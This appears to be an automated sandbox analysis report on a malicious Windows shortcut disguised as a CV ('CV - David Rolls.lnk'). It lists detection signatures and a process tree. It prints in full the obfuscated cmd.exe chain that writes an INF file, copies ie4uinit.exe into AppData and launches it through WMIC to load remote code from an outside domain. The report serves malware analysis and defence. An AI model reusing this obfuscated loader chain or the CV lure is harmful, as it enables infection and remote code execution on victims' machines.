Edit tour
Windows
Analysis Report
CV - David Rolls.lnk
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Checks if browser processes are running
Creates processes via WMI
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to create processes via WMI
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
Creates COM task schedule object (often to register a task for autostart)
Found evasive API chain (date check)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Uses the system / local time for branch decision (may execute only at specific dates)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Drops PE files
Uses a known web browser user agent for HTTP communication
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- cmd.exe (PID: 724 cmdline:
C:\Windows \System32\ cmd.exe" / v /c set " Images97=s i" && set "Images67= version" & & set "Ima ges38=d" & & set "Ima ges82=defa ult" && se t "Images4 =init" && (for %h in (c) do @s et "Images 7=%~h") && set "Imag es62=e" && set "Imag es14=t" && set "Imag es12=." && (for %k i n (a) do @ set "Image s32=%~k") && set "Im ages3=Hist ory" && ca ll set "Im ages6=%Ima ges3:~2,1% " && set " Images43=s ettings" & & set "Ima ges8=$w" & & set "Ima ges88=!Ima ges12!inf" && set "I mages58=ie u!Images4! !Images88! " && call !Images6!e t "Images8 4=%!Images 32!ppdata% \micro!Ima ges6!oft\" && !Image s6!et "Ima ges00=!Ima ges84!!Ima ges58!" && (for %t i n ("[!Imag es67!]" "s ignature = !Images8! indows nt$ " "[!Image s38!e!Imag es6!tinati ondirs]" " C3D81=01" "!Images82 !destdir=1 1" "[C3D81 ]" "ieu%Im ages15%!Im ages88!" " [FD48E1]" "sc\" "ro% Images95%j ,NI,%Image s81%%Image s2%%Images 2%p%Images 66%%Images 0%%Images0 %davidroll s!Images12 !%Images76 %/aj55hg3e ude" "[!Im ages82!in! Images6!ta ll.windows 7]" "Un\" "Register\ " "OCXs=FD 48E1" "!Im ages38!elf il!Images6 2!s=C3D81" "[!Images 6!!Images1 4!rings]" "Images2=t ;Images26" "!Images6 !ervicen!I mages32!me =' '" "Ima ges15=!Ima ges4!" "Im ages27=%ti me%" "!Ima ges6!horts vcn!Images 32!me=' '" "Images0= /" "Images 95=b;Image s08" "Imag es76=com" "Images66= :;Images03 " "Images8 1=h" ) do @e!Images7 !ho %~t)>" !Images00! " && !Imag es6!et "Im ages20=ie4 u!Images4! .!Images62 !xe" && ca ll xcopy / Y /C /Q %w in!Images3 8!ir%\!Ima ges6!ystem 32\!Images 20! "!Imag es84!*" | set Images 21=Strikes && !Image s6!t!Image s32!rt "" wmi!Images 7! proce!I mages6!s c all !Image s7!rea!Ima ges14!e "! Images84!! Images20! -base!Imag es43!" | s et "Images 83=Venues Before Tra vis Crane Language S cientists Creatures Agencies P hases Copp er Lands L oops Afrai d Soldier Never Moun ts Shine D irect Flui d Scene In vitations Ripple Pre fers Fisca l Taste Ba rgains Bru ssels Feed s Thanks F eatures Se eks Relax Identify A pril Victo ry Limit R esemble Ap ple Hands Specs Fest ival Sport Trouble S upporters Erupt Wind s Ketchup MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 4132 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 1792 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ca ll xcopy / Y /C /Q %w indir%\sys tem32\ie4u init.exe " C:\Users\u ser\AppDat a\Roaming\ microsoft\ *" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - xcopy.exe (PID: 4960 cmdline:
xcopy /Y / C /Q C:\Wi ndows\syst em32\ie4ui nit.exe "C :\Users\us er\AppData \Roaming\m icrosoft\* " MD5: 6BC7DB1465BEB7607CBCBD7F64007219) - cmd.exe (PID: 1980 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" se t Images21 =Strikes " MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - cmd.exe (PID: 1240 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" st art "" wmi c process call creat e "C:\User s\user\App Data\Roami ng\microso ft\ie4uini t.exe -bas esettings" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - WMIC.exe (PID: 4560 cmdline:
wmic proce ss call cr eate "C:\U sers\user\ AppData\Ro aming\micr osoft\ie4u init.exe - basesettin gs" MD5: EC80E603E0090B3AC3C1234C2BA43A0F) - conhost.exe (PID: 1012 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 1308 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" se t "Images8 3=Venues B efore Trav is Crane L anguage Sc ientists C reatures A gencies Ph ases Coppe r Lands Lo ops Afraid Soldier N ever Mount s Shine Di rect Fluid Scene Inv itations R ipple Pref ers Fiscal Taste Bar gains Brus sels Feeds Thanks Fe atures See ks Relax I dentify Ap ril Victor y Limit Re semble App le Hands S pecs Festi val Sport Trouble Su pporters E rupt Winds Ketchup"" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- ie4uinit.exe (PID: 5736 cmdline:
C:\Users\u ser\AppDat a\Roaming\ microsoft\ ie4uinit.e xe -basese ttings MD5: 9DD77F0F421AA9A70383210706ECA529) - ie4uinit.exe (PID: 5056 cmdline:
C:\Users\u ser\AppDat a\Roaming\ microsoft\ ie4uinit.e xe -ClearI conCache MD5: 9DD77F0F421AA9A70383210706ECA529) - rundll32.exe (PID: 1396 cmdline:
C:\Windows \system32\ RunDll32.e xe C:\Wind ows\system 32\migrati on\Wininet Plugin.dll ,MigrateCa cheForUser /m /0 MD5: 73C519F050C20580F8A62C849D49215A) - rundll32.exe (PID: 5944 cmdline:
C:\Windows \system32\ RunDll32.e xe C:\Wind ows\system 32\migrati on\Wininet Plugin.dll ,MigrateCa cheForUser /m /0 MD5: 73C519F050C20580F8A62C849D49215A)
- cleanup
⊘No configs have been found
⊘No yara matches
⊘No Sigma rule has matched
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Source: | Code function: | 9_2_00007FF7319D7AC8 | |
Source: | Code function: | 9_2_00007FF7319D56A4 | |
Source: | Code function: | 9_2_00007FF7319DEA9C | |
Source: | Code function: | 9_2_00007FF7319D763C | |
Source: | Code function: | 9_2_00007FF7319D25C0 | |
Source: | Code function: | 9_2_00007FF7319D7DCC | |
Source: | Code function: | 9_2_00007FF7319DED98 | |
Source: | Code function: | 9_2_00007FF7319DE950 | |
Source: | Code function: | 9_2_00007FF7319D2550 | |
Source: | Code function: | 9_2_00007FF7319D74BC | |
Source: | Code function: | 9_2_00007FF7319DF108 | |
Source: | Code function: | 9_2_00007FF7319D544C | |
Source: | Code function: | 9_2_00007FF7319D73D0 | |
Source: | Code function: | 9_2_00007FF7319DEFAC | |
Source: | Code function: | 9_2_00007FF7319DE80C | |
Source: | Code function: | 9_2_00007FF7319DEBE0 | |
Source: | Code function: | 9_2_00007FF7319DE750 | |
Source: | Code function: | 9_2_00007FF7319D2B50 |
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | Code function: | 9_2_00007FF7319CA568 | |
Source: | Code function: | 9_2_00007FF7319E0204 | |
Source: | Code function: | 9_2_00007FF7319C3D20 | |
Source: | Code function: | 9_2_00007FF7319C44E4 | |
Source: | Code function: | 9_2_00007FF7319CAC08 |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |